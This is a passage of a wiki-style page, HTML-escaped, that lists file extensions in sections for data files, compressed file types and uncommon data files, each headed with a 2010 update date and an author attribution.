.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
.t03&lt;br /&gt;
.t04&lt;br /&gt;
.t05&lt;br /&gt;
.t06&lt;br /&gt;
.t07&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.t3001&lt;br /&gt;
.tax2008&lt;br /&gt;
.tax2009&lt;br /&gt;
.tb&lt;br /&gt;
.tbk&lt;br /&gt;
.tbl&lt;br /&gt;
.tcc&lt;br /&gt;
.tcx&lt;br /&gt;
.tda&lt;br /&gt;
.tdl&lt;br /&gt;
.tdm&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.te3&lt;br /&gt;
.teacher&lt;br /&gt;
.tef&lt;br /&gt;
.tet&lt;br /&gt;
.tfa&lt;br /&gt;
.tfd&lt;br /&gt;
.tfrd&lt;br /&gt;
.tjp&lt;br /&gt;
.tk3&lt;br /&gt;
.tkfl&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.topc&lt;br /&gt;
.tpb&lt;br /&gt;
.tps&lt;br /&gt;
.tr3&lt;br /&gt;
.tra&lt;br /&gt;
.trd&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tst&lt;br /&gt;
.tsv&lt;br /&gt;
.ttk&lt;br /&gt;
.txa&lt;br /&gt;
.txd&lt;br /&gt;
.txf&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udb&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.ulf&lt;br /&gt;
.ulz&lt;br /&gt;
.update&lt;br /&gt;
.upoi&lt;br /&gt;
.usr&lt;br /&gt;
.uvf&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vbpf1&lt;br /&gt;
.vcd&lt;br /&gt;
.vce&lt;br /&gt;
.vcf&lt;br /&gt;
.vcs&lt;br /&gt;
.vdb&lt;br /&gt;
.vdx&lt;br /&gt;
.vfs&lt;br /&gt;
.vi&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vmt&lt;br /&gt;
.voi&lt;br /&gt;
.vok&lt;br /&gt;
.vrd&lt;br /&gt;
.vscontent&lt;br /&gt;
.vsx&lt;br /&gt;
.vtx&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb2&lt;br /&gt;
.wb3&lt;br /&gt;
.wdb&lt;br /&gt;
.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
